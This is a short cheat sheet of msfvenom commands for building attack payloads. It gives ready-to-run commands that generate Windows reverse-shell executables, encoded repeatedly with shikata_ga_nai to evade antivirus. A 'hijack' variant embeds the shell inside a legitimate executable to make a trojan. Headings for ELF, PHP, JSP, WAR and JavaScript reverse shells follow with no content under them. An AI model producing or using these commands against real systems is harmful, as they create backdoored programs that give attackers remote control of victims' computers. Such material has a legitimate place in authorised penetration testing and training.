Msfvenom
Commands
Generic
msfvenom -h
msfvenom -l <formats/payloads/encoders/nops>Quick payload generation
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <format> -o <filename> #create runnable payload
msfvenom -p <payload> LHOST=<ip> LPORT=<port> -f <lang> -v <varname> #create payload source codeCommon payloads
Windows EXE reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -e x86/shikata_ga_nai -i 8 -o rv.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -e x86/shikata_ga_nai -i 8 -o rv.exe
msfvenom -p windows/powershell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -e x86/shikata_ga_nai -i 8 -o rv.exeWindows EXE hijack
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -x <exe file> -k -e x86/shikata_ga_nai -i 8 -o rv.exe
msfvenom -p windows/powershell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -x <exe file> -k -e x86/shikata_ga_nai -i 8 -o rv.exeWindows malicious installer
*nix ELF reverse shell
BOF payload
.NET reverse shell
JSP reverse shell
PHP reverse shell
WAR file reverse shell
JavaScript reverse shell
Last updated